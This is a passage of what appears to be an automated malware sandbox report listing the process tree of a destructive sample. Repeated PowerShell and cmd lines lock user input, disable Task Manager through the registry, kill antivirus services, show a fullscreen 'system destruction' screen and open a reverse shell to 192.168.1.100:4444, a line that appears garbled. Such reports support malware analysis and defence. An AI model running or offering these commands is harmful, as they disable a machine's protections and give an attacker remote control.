        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        23⤵
        
        PID:596
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\ozyvkm0h\ozyvkm0h.cmdline"
        24⤵
        
        PID:652
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB93E.tmp" "c:\Users\Admin\AppData\Local\Temp\ozyvkm0h\CSC57AF0BF3FB44D1387ECE8BC5E521749.TMP"
        25⤵
        
        PID:1884
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        23⤵
        
        PID:5192
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        23⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:6508
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        21⤵
        
        PID:1636
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mhaxmtl4\mhaxmtl4.cmdline"
        22⤵
        
        PID:1144
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        21⤵
        
        PID:168
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dxaamo4f\dxaamo4f.cmdline"
        22⤵
        
        PID:1732
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESABFF.tmp" "c:\Users\Admin\AppData\Local\Temp\dxaamo4f\CSCF6172C91B2A74DC485D6661E5A59C.TMP"
        23⤵
        
        PID:6120
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        21⤵
        
        PID:2072
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        21⤵
        
        PID:5172
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\joqe0pca\joqe0pca.cmdline"
        22⤵
        
        PID:6100
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESB1DB.tmp" "c:\Users\Admin\AppData\Local\Temp\joqe0pca\CSCCD4E0C0B936B43BD8E3ECE6CA52DEDD.TMP"
        23⤵
        
        PID:1760
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        21⤵
        
        PID:1264
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        21⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5508
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        21⤵
        
        PID:8388
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        21⤵
        Kills process with taskkill
        
        PID:8468
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM AvastSvc.exe /F
        21⤵
        Kills process with taskkill
        
        PID:8732
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM avgsvc.exe /F
        21⤵
        Kills process with taskkill
        
        PID:8804
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM McAfee.exe /F
        21⤵
        Kills process with taskkill
        
        PID:8868
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Norton.exe /F
        21⤵
        Kills process with taskkill
        
        PID:9012
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        19⤵
        
        PID:4804
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\s3zqrp3b\s3zqrp3b.cmdline"
        20⤵
        
        PID:5032
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        19⤵
        
        PID:4264
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mjuucgpe\mjuucgpe.cmdline"
        20⤵
        
        PID:6080
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA875.tmp" "c:\Users\Admin\AppData\Local\Temp\mjuucgpe\CSC187F7F87CED7476C8C325C28154CE81F.TMP"
        21⤵
        
        PID:2384
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        19⤵
        
        PID:4800
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        19⤵
        
        PID:2804
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\dkkeh5fb\dkkeh5fb.cmdline"
        20⤵
        
        PID:1264
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESAE8F.tmp" "c:\Users\Admin\AppData\Local\Temp\dkkeh5fb\CSC48C663033CF14C1F97CB4B76531EB8E2.TMP"
        21⤵
        
        PID:5072
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        19⤵
        
        PID:5976
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        19⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5596
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        19⤵
        
        PID:8588
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        17⤵
        
        PID:4012
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\mux4gjnj\mux4gjnj.cmdline"
        18⤵
        
        PID:60
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        17⤵
        
        PID:1644
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\yzddp1jl\yzddp1jl.cmdline"
        18⤵
        
        PID:6068
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA2C8.tmp" "c:\Users\Admin\AppData\Local\Temp\yzddp1jl\CSCF88AD17A8EE540F0ACF0EEBD743DA874.TMP"
        19⤵
        
        PID:2580
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        17⤵
        
        PID:3340
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        17⤵
        
        PID:5464
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\o123ebi4\o123ebi4.cmdline"
        18⤵
        
        PID:5848
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA807.tmp" "c:\Users\Admin\AppData\Local\Temp\o123ebi4\CSC2EAE6E3A2C15447886E07CF69B877FBD.TMP"
        19⤵
        
        PID:5408
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        17⤵
        
        PID:5932
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        17⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4500
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        17⤵
        
        PID:4212
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        17⤵
        Kills process with taskkill
        
        PID:8668
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM AvastSvc.exe /F
        17⤵
        Kills process with taskkill
        
        PID:8704
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM avgsvc.exe /F
        17⤵
        Kills process with taskkill
        
        PID:8944
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM McAfee.exe /F
        17⤵
        Kills process with taskkill
        
        PID:9004
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        15⤵
        
        PID:596
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\q3g4dquk\q3g4dquk.cmdline"
        16⤵
        
        PID:4840
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        15⤵
        
        PID:4488
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\duq3yj1m\duq3yj1m.cmdline"
        16⤵
        
        PID:5468
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9CCC.tmp" "c:\Users\Admin\AppData\Local\Temp\duq3yj1m\CSC1AF1FF5FE06C429DB799B5B5D8BA5465.TMP"
        17⤵
        
        PID:5960
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        15⤵
        
        PID:2408
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        15⤵
        
        PID:5952
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\g1wyblxd\g1wyblxd.cmdline"
        16⤵
        
        PID:2072
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA23B.tmp" "c:\Users\Admin\AppData\Local\Temp\g1wyblxd\CSC69452068DFC646849DF3C0854A65CB8.TMP"
        17⤵
        
        PID:5224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        15⤵
        
        PID:4532
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        15⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4720
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        15⤵
        
        PID:1304
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        15⤵
        Kills process with taskkill
        
        PID:8772
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM AvastSvc.exe /F
        15⤵
        Kills process with taskkill
        
        PID:8972
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        13⤵
        
        PID:4796
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\br300mve\br300mve.cmdline"
        14⤵
        
        PID:3320
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        13⤵
        
        PID:5152
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\pistassi\pistassi.cmdline"
        14⤵
        
        PID:5748
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9B07.tmp" "c:\Users\Admin\AppData\Local\Temp\pistassi\CSC22715939471947E69872A7C656FD4419.TMP"
        15⤵
        
        PID:5884
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        13⤵
        
        PID:4712
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        13⤵
        
        PID:1736
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\4hqsthec\4hqsthec.cmdline"
        14⤵
        
        PID:5272
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9F6C.tmp" "c:\Users\Admin\AppData\Local\Temp\4hqsthec\CSC7BEA517C6C3F4B73B09EBFFA7A532E6B.TMP"
        15⤵
        
        PID:5008
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        13⤵
        
        PID:1316
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        13⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:2356
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        13⤵
        
        PID:4828
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        13⤵
        Kills process with taskkill
        
        PID:8780
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM AvastSvc.exe /F
        13⤵
        Kills process with taskkill
        
        PID:8980
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class FullScreen { [DllImport(\"user32.dll\")] public static extern int MessageBoxTimeout(IntPtr hWnd, String text, String caption, uint type, int wLanguageId, int milliseconds); }; [FullScreen]::MessageBoxTimeout([IntPtr]::Zero, \"Your system is being destroyed. This is irreversible. You cannot escape.\", \"WARNING\", 0x00000010, 0, 86400000)'"
        11⤵
        
        PID:2136
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\504y24cu\504y24cu.cmdline"
        12⤵
        
        PID:3612
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System.Runtime.InteropServices; public class InputBlock { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [InputBlock]::BlockInput($true)"
        11⤵
        
        PID:5168
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\g12hln4p\g12hln4p.cmdline"
        12⤵
        
        PID:5864
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9402.tmp" "c:\Users\Admin\AppData\Local\Temp\g12hln4p\CSC97EBC10653784979B7385AAE6D36E495.TMP"
        13⤵
        
        PID:5972
        
        C:\Windows\system32\reg.exe
        
        reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /v DisableTaskMgr /t REG_DWORD /d 1 /f
        11⤵
        
        PID:5492
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "Add-Type -TypeDefinition 'using System; using System.Runtime.InteropServices; public class DisableKeys { [DllImport(\"user32.dll\")] public static extern int BlockInput(bool block); }'; [DisableKeys]::BlockInput($true)"
        11⤵
        
        PID:5580
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\0ytddsbd\0ytddsbd.cmdline"
        12⤵
        
        PID:5264
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES98B6.tmp" "c:\Users\Admin\AppData\Local\Temp\0ytddsbd\CSCCF5D81B9F22E43CF937CB6339F076C3.TMP"
        13⤵
        
        PID:5224
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$obj = New-Object -ComObject WScript.Shell; $obj.SendKeys('{TAB}')"
        11⤵
        
        PID:6052
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -WindowStyle Hidden -Command "$form = New-Object Windows.Forms.Form; $form.WindowState = 'Maximized'; $form.TopMost = $true; $form.BackColor = 'Black'; $label = New-Object Windows.Forms.Label; $label.Text = 'WARNING: SYSTEM DESTRUCTION INITIATED!'; $label.ForeColor = 'Red'; $label.Font = 'Microsoft Sans Serif, 48pt'; $label.AutoSize = $true; $label.TextAlign = 'MiddleCenter'; $form.Controls.Add($label); $form.ShowDialog()"
        11⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:5888
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -Command "$client = New-Object System.Net.Sockets.TCPClient('192.168.1.100', 4444); $stream = $client.GetStream(); [byte[]]$bytes = 0..65535|:ASCII).GetBytes($sendback2); $stream.Write($sendbyte,0,$sendbyte.Length); $stream.Flush()}; $client.Close()"
        11⤵
        
        PID:7552
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM MsMpEng.exe /F
        11⤵
        Kills process with taskkill
        
        PID:6980
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM AvastSvc.exe /F
        11⤵
        Kills process with taskkill
        
        PID:5652
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM avgsvc.exe /F
        11⤵
        Kills process with taskkill
        
        PID:6888
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM McAfee.exe /F
        11⤵
        Kills process with taskkill
        
        PID:8436
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /IM Norton.exe /F
        11⤵
        Kills process with taskkill
        
        PID:8900
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
